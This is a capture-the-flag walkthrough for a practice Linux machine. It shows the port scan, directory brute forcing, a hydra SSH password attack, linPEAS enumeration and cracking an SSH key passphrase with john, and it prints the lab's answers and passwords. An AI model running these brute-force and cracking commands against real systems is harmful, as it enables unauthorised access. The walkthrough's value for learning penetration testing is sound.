Web App Testing and Privilege Escalation
Find the services exposed by the machine
We are going to start with a fast Nmap scan and then a more detailed of the ports found
1
nmap -p- -open -T4 -v -n 10.10.31.125
1
2
3
4
5
6
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
8009/tcp open ajp13
1
nmap -p- -open -T4 -v -n 10.10.31.125
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db45cbbe4a8b71f8e93142aefff845e4 (RSA)
| 256 09b9b91ce0bf0e1c6f7ffe8e5f201bce (ECDSA)
|_ 256 a5682b225f984a62213da2e2c5a9f7c2 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
1339/tcp closed kjtsiteserver
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
| ajp-methods:
|_ Supported methods: GET HEAD POST OPTIONS
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel
What is the name of the hidden directory on the web server(enter name without /)?
Going to the site there’s nothing helpful, but in the source code, there’s a comment “Check our dev note section if you need to know what to work on.” this might be a hint. anyway let’s run a directory scan with Gobuster
1
gobuster dir -u 10.10.31.125 -w /usr/share/dirb/wordlists/common.txt
and sure it was, the scan found the /development directory. in there, we found two notes
1
2
3
4
5
6
7
For J:
I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials,
and I was able to crack your hash really easily. You know our password policy, so please follow
it? Change that password ASAP.
-K
1
2
3
4
5
6
7
8
9
2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat
to host that on this server too. Haven't made any real web apps yet, but I have tried that example
you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm
using version 2.5.12, because other versions were giving me trouble. -K
2018-04-22: SMB has been configured. -K
2018-04-21: I got Apache set up. Will put in our content later. -J
from this we can deduct things, there are two potential users -J and -K, the user -J has a weak password, and they’re using some software with version 2.5.12
User brute-forcing to find the username & password
I don’t how I was supposed to brute force the username but doing reconnaissance on the smb service I found a Anonymous share that I can log into, and there it was a note with the usernames
1
2
3
4
5
6
Announcement to staff:
PLEASE do not upload non-work-related items to this share. I know it's all in fun, but
this is how mistakes happen. (This means you too, Jan!)
-Kay
What is the username?
jan
What is the password?
now I guess this is the part where I have to brute force, and by discard, I’ll brute force the ssh service. For this I’ll use hydra, the syntax is: hydra -l [user] -P [passlist] [ip] -t 64 ssh
- t being the number of parallel task
1
hydra -l jan -P /usr/share/wordlists/rockyou.txt 10.10.31.125 -t 64 ssh
and we got a password!
1
[22][ssh] host: 10.10.31.125 login: jan password: armando
armando
What service do you use to access the server(answer in abbreviation in all caps)?
SSH
Enumerate the machine to find any vectors for privilege escalation
I didn’t find anything doing a quick enum so I’ll try to use linPEAS as the hint also say.
I don’t have writing permissions on my home directory so I’ll transfer the file to the /dev/shm directory which is for creating temporary files and we have writing permissions there using scp.
1
scp ./linpeas.sh jan@10.10.31.125:/dev/shm
then make it executable and run it
1
2
chmod +x linpeas.sh
./linpeas.sh
kay id_rsa key is readable
What is the name of the other user you found(all lower case)?
checking the /home directory we can see that is:
kay
If you have found another user, what can you do with this information?
since we know that kay id_rsa key is readable let’s try to crack it with john
first, we convert it to a format that john understand with ssh2john
1
ssh2john id_rsa > hash
then we can crack the passphrase with:
1
john -w=/usr/share/wordlists/rockyou.txt hash
this gave us
1
beeswax (id_rsa)
now let’s try to connect to this user.
remember to give permissions to the id_rsa key
1
chmod 600 id_rsa
and now we connect with:
1
ssh -i id_rsa kay@10.10.31.125
we put in the passphrase that we cracked, and we are in!
What is the final password you obtain?
now that we are in we can read the file pass.bak that we saw previously in the enum phase, which contained this password.
heresareallystrongpasswordthatfollowsthepasswordpolicy$$